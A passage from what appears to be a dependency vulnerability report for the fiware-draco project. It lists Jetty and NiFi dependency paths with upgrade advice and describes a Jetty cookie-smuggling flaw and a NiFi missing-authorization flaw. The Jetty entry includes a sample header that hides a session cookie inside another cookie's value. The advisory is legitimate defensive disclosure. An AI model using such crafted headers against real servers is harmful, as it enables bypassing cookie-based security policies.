    Remediation: Upgrade to org.apache.nifi:nifi-mongodb-client-service-api-nar@1.21.0.
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.nifi:nifi-mongodb-client-service-api-nar@1.15.3 org.apache.nifi:nifi-standard-services-api-nar@1.15.3 org.apache.nifi:nifi-jetty-bundle@1.15.3 org.eclipse.jetty:jetty-servlet@9.4.40.v20210413 org.eclipse.jetty:jetty-security@9.4.40.v20210413 org.eclipse.jetty:jetty-server@9.4.44.v20210927
    Remediation: Upgrade to org.apache.nifi:nifi-mongodb-client-service-api-nar@1.21.0.
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.nifi:nifi-mongodb-client-service-api-nar@1.15.3 org.apache.nifi:nifi-standard-services-api-nar@1.15.3 org.apache.nifi:nifi-jetty-bundle@1.15.3 org.eclipse.jetty:jetty-webapp@9.4.40.v20210413 org.eclipse.jetty:jetty-servlet@9.4.40.v20210413 org.eclipse.jetty:jetty-security@9.4.40.v20210413 org.eclipse.jetty:jetty-server@9.4.44.v20210927
    Remediation: Upgrade to org.apache.nifi:nifi-mongodb-client-service-api-nar@1.21.0.
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.nifi:nifi-mongodb-client-service-api-nar@1.15.3 org.apache.nifi:nifi-standard-services-api-nar@1.15.3 org.apache.nifi:nifi-jetty-bundle@1.15.3 org.eclipse.jetty:jetty-annotations@9.4.44.v20210927 org.eclipse.jetty:jetty-webapp@9.4.40.v20210413 org.eclipse.jetty:jetty-servlet@9.4.40.v20210413 org.eclipse.jetty:jetty-security@9.4.40.v20210413 org.eclipse.jetty:jetty-server@9.4.44.v20210927
    Remediation: Upgrade to org.apache.nifi:nifi-mongodb-client-service-api-nar@1.21.0.
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.nifi:nifi-mongodb-client-service-api-nar@1.15.3 org.apache.nifi:nifi-standard-services-api-nar@1.15.3 org.apache.nifi:nifi-jetty-bundle@1.15.3 org.eclipse.jetty:jetty-deploy@9.4.44.v20210927 org.eclipse.jetty:jetty-webapp@9.4.40.v20210413 org.eclipse.jetty:jetty-servlet@9.4.40.v20210413 org.eclipse.jetty:jetty-security@9.4.40.v20210413 org.eclipse.jetty:jetty-server@9.4.44.v20210927
    Remediation: Upgrade to org.apache.nifi:nifi-mongodb-client-service-api-nar@1.21.0.
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.nifi:nifi-mongodb-client-service-api-nar@1.15.3 org.apache.nifi:nifi-standard-services-api-nar@1.15.3 org.apache.nifi:nifi-jetty-bundle@1.15.3 org.eclipse.jetty:jetty-annotations@9.4.44.v20210927 org.eclipse.jetty:jetty-plus@9.4.44.v20210927 org.eclipse.jetty:jetty-webapp@9.4.40.v20210413 org.eclipse.jetty:jetty-servlet@9.4.40.v20210413 org.eclipse.jetty:jetty-security@9.4.40.v20210413 org.eclipse.jetty:jetty-server@9.4.44.v20210927
    Remediation: Upgrade to org.apache.nifi:nifi-mongodb-client-service-api-nar@1.21.0.
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.nifi:nifi-mongodb-client-service-api-nar@1.15.3 org.apache.nifi:nifi-standard-services-api-nar@1.15.3 org.apache.nifi:nifi-jetty-bundle@1.15.3 org.eclipse.jetty:apache-jsp@9.4.44.v20210927 org.eclipse.jetty:jetty-annotations@9.4.44.v20210927 org.eclipse.jetty:jetty-webapp@9.4.40.v20210413 org.eclipse.jetty:jetty-servlet@9.4.40.v20210413 org.eclipse.jetty:jetty-security@9.4.40.v20210413 org.eclipse.jetty:jetty-server@9.4.44.v20210927
    Remediation: Upgrade to org.apache.nifi:nifi-mongodb-client-service-api-nar@1.21.0.
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.nifi:nifi-mongodb-client-service-api-nar@1.15.3 org.apache.nifi:nifi-standard-services-api-nar@1.15.3 org.apache.nifi:nifi-jetty-bundle@1.15.3 org.eclipse.jetty:apache-jsp@9.4.44.v20210927 org.eclipse.jetty:jetty-annotations@9.4.44.v20210927 org.eclipse.jetty:jetty-plus@9.4.44.v20210927 org.eclipse.jetty:jetty-webapp@9.4.40.v20210413 org.eclipse.jetty:jetty-servlet@9.4.40.v20210413 org.eclipse.jetty:jetty-security@9.4.40.v20210413 org.eclipse.jetty:jetty-server@9.4.44.v20210927
    Remediation: Upgrade to org.apache.nifi:nifi-mongodb-client-service-api-nar@1.21.0.

Overview

org.eclipse.jetty:jetty-server is a lightweight highly scalable java based web server and servlet engine.

Affected versions of this package are vulnerable to Information Exposure such that nonstandard cookie parsing may allow an attacker to smuggle cookies within other cookies, or otherwise perform unintended behavior by tampering with the cookie parsing mechanism. If Jetty sees a cookie VALUE that starts with " (double quote), it will continue to read the cookie string until it sees a closing quote -- even if a semicolon is encountered. Exploiting this vulnerability results in cookies exfiltration and policy based on cookies bypass.

Note: A cookie header such as: DISPLAY_LANGUAGE="b; JSESSIONID=1337; c=d" will be parsed as one cookie, with the name DISPLAY_LANGUAGE and a value of b; JSESSIONID=1337; c=d instead of 3 separate cookies.

Remediation

Upgrade org.eclipse.jetty:jetty-server to version 9.4.51, 10.0.14, 11.0.14, 12.0.0.beta0 or higher.

References

low severity

Missing Authorization

  • Vulnerable module: org.apache.nifi:nifi-framework-api
  • Introduced through: org.apache.nifi:nifi-mongodb-client-service-api-nar@1.15.3

Detailed paths

  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.nifi:nifi-mongodb-client-service-api-nar@1.15.3 org.apache.nifi:nifi-standard-services-api-nar@1.15.3 org.apache.nifi:nifi-jetty-bundle@1.15.3 org.apache.nifi:nifi-framework-api@1.15.3

Overview

Affected versions of this package are vulnerable to Missing Authorization when creating new Process Groups. A user with permission to create Process Groups on an application using a component-based authorization policy can include references to unauthorized Controller Services or Parameter Providers. Clients can then download non-sensitive Parameter values from the new Process Groups.

Remediation

Upgrade org.apache.nifi:nifi-framework-api to version 2.1.0 or higher.

References